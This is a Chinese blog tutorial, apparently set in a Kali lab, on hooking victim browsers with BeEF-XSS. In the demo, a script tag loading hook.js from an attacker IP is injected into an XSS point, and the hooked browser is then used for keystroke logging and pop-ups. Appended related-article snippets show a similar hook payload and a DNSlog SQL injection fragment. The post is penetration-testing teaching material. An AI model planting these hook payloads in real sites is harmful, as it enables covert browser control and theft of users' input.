kali BeEF-XSS的使用

最新推荐文章于 2025-02-23 11:46:59 发布
最新推荐文章于 2025-02-23 11:46:59 发布
阅读量1.6k 收藏 6
点赞数
文章标签: kali linux xss 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/117479182
版权

0x00 BeEF简介

BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。

beef管理,挂钩web浏览器的过程:

  1. 生成交互 payload 的 hook;
  2. 服务器端:beef 作为服务端管理,管理访问运行了 hook 的客户端;
  3. 客户端:运行与客户端浏览器的 js 脚本,也就是 beef 生成的 payload;
  4. beef 将运行了 hook 的 web 浏览器钩住,进行管理

0x01 攻击手段

配合xss,将hook插入到存在xss的注入处;
直接诱使客户端访问含有 hook 的伪造站点;
结合中间人攻击注入 hook 脚本

用途:键盘记录器、网络扫描、浏览器信息收集、绑定 shell、与 metasploit 集成等

0x02 靶场演示

终端输入beef-xss启动,登录web页面:
在这里插入图片描述
Hocked Browers:

  • online browers 在线浏览器
  • offline browers 离线浏览器

Detials:

  • 浏览器、插件版本信息,操作系统信息

Logs:

  • 浏览器动作:焦点变化,鼠标单击,信息输入

commands:

  • 绿色模块:表示模块适用当前用户,并且执行结果对用户不可见
  • 红色模块:表示模块不适用当前用户,有些红色模块也可以执行
  • 橙色模块:模块可用,但结果对用户可见
  • 灰色模块:模块为在目标浏览器上测试过

构造payload插入注入点:<script src="http://192.168.1.117:3000/hook.js"></script>
在这里插入图片描述
提交后靶机的浏览器就被beef钩住了:
在这里插入图片描述

0x03 BeEF管理

Detailes模块是浏览器、插件版本信息,操作系统信息:
在这里插入图片描述
Logs模块可以查看鼠标点击,键盘输入的一些操作:
在这里插入图片描述
commands模块可以对目标系统进行入侵:
create Alert Dialog可以在目标系统上弹窗:
在这里插入图片描述
执行后目标系统就能看到弹窗了:
在这里插入图片描述

参考链接:
https://www.cnblogs.com/-chenxs/p/12331127.html

yAnd0n9
关注
漏洞扫描(kali beef-xss、DNSlog、CSRF、SSRF)
m0_61506558的博客
08-04 1861
并且其中的内容会被服务器端执行,插入的代码可能导致任意文件读取、系统命令执行、内网端口 探测、攻击内网网站等危害。,'.yourid.ceye.io/jinyiuxin'))),1,0) 黑体处拼接SQL语句。gopher协议:是一种信息查找系统,只支持文本,不支持图像,已被HTTP替代。第三方网站利用被攻击网站生效的cookie,直接对服务器接口发起请求。抓取正常通信请求的数据包,再请求一次。.........
beef-xss安装与使用
Bu2n的博客
12-07 3685
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
XSS跨站脚本攻击理论和实战 XSS构造脚本+手动XSS+利用BEef自动化XSS(网络安全学习13)
Until_U的博客
07-06 6183
CONTENTS 1 XSS简介 2 构造XSS脚本 2.1 常用的HTML标签 2.2 常用java script方法 2.3 构造XSS脚本 3 反射型XSS 4 存储型XSS 5 kali渗透获取cookie 6 自动化XSS 6.1 BEef简介 6.2 BEef的主要功能 6.3 BEef实战 1 XSS简介 (1)XSS相关概念 跨站脚本( cross site script )为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现...
Kali安装beef-xss
qq_58000413的博客
08-10 2473
不更新可能会出现下面的情况:metasploit-framework : 依赖: ruby (< 1:2.8) 但是 1:3.0+1kali1 正要被安装。#把192.168.199.129替换成本机IP。
Beef-XSS使用
clown_YZ的博客
02-23 887
xss
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 3799
Kali beef-xss实现Xss详细教程。
kali 中安装 beef-xss
挖到0day了吗?
02-27 1501
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。beef是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。本文将介绍安装beef。新版的kail已经不自带beef工具了,需要自己下载。
kali新手入门教学(7)--beef-xss的安装,配置,debug
azraelxuemo的博客
05-14 4384
beef-xss的路径是在/usr/share/beef-xss cd /usr/share/beef-xss ls 然后有个配置文件config.yaml 修改这个文件 vi config.yaml 找到user和password然后修改,beef不允许默认用户名密码登录 然后找到metasploit,改为true 保存退出 cd extensions cd metasploit 然后修改这里面的config.yaml 1.enable改成true 2.host和callback_host改成当前主机
kali首次使用beef-xss时,beef-xss.service 的active状态failed
最新发布
03-21
好的,我现在需要帮助用户解决Kali LinuxBeEF-XSS服务启动失败的问题。首先,我得回忆一下BeEF的基本结构和常见问题。BeEF(Browser Exploitation Framework)是一个专注于浏览器漏洞利用的框架,常用于渗透测试。...
kali BEEF-XSS启动报错解决
06-01
1. 检查端口是否被占用:BEEF-XSS默认使用3000端口,确保该端口没有被其他程序占用。 2. 检查依赖项是否安装:BEEF-XSS需要一些依赖项支持,如Ruby、RubyGems、Bundler等。确保这些依赖项已经正确安装。 3. 更新...
BeEF-XSS攻击
彭淦淦的博客
05-11 1074
6.1 问题 Kali虚拟机(192.168.111.132)搭建BeEF服务 宿主机(192.168.111.1)搭建正常网站 Win2008虚拟机(192.168.111.133)模拟用户被攻击 6.2 步骤 实现此案例需要按照如下步骤进行。 1)Kali虚拟机安装BeEF,依次运行命令apt-get update,apt-get install beef-xss,安装完成后启动beef-xss,用户名beef,自定义密码例如123456,如图-11和图-12所示 图-11 图-1
2021Kali系列 -- XSS漏洞(Beef-xss
Web安全工具库
04-14 2034
​当我不欠任何人的时候,我就只欠我自己了。。。 ----网易云热评 一、安装beef-xss 输入beef-xss,提示安装,输入y 二、启动beef-xss 三、访问登陆页面: http://192.168.139.133:3000/ui/panel 四、让目标主机访问存在生成的钩子代码 http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.1.
Kali安装beef-xssbeef-xss无法执行默认网络浏览器,beef-xss忘记/修改用户名密码
weixin_49112478的博客
07-12 2014
卡里安装beef-xss教程;解决beef-xss无法执行默认网络浏览器问题;beef-xss找回/修改用户名密码的方法介绍
beef-xss详细教程(一文带你学会beef) - Kali下安装beef - beef-xss反射型,储存型利用 - beef实现Cookie会话劫持 - 键盘监听 - 浏览器弹窗,重定向等
dzqxwzoe的博客
08-21 1725
✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆🔥系列专栏 :XSS漏洞应用-Beef💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
XSS另类攻击(四)kali系统beef-xss安装和使用
06-01 1655
本文介绍kali系统beef-xss安装、异常情况解决、使用示例说明。
渗透利器-kali工具 (第三章-6) Xss漏洞学习之-Beef-Xss
ztc131450的博客
11-11 773
注入攻击的本质,是把用户输入的数据当做代码执行。条件:用户能够控制值输入原本要执行的代码,拼接了用户输入的数据。
kali2021安装beef-xss使用
qq_53365842的博客
03-29 3600
安装beef:apt install beef-xss 切换到beef目录(kali版本不同,beef配置文件位置不同): cd /etc/beef-xss/config.yaml 或者 cd /usr/share/beef-xss/config.yaml 打开配置文件: vim /etc/beef-xss/config.yaml / vim /usr/share/beef-xss/config.yaml 修改密码和修改host值,改成kali的IP地址 启动beefbeef-xss/beef
Beefxss使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
02-16 1万+
Beef-XSS是一款功能强大的「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值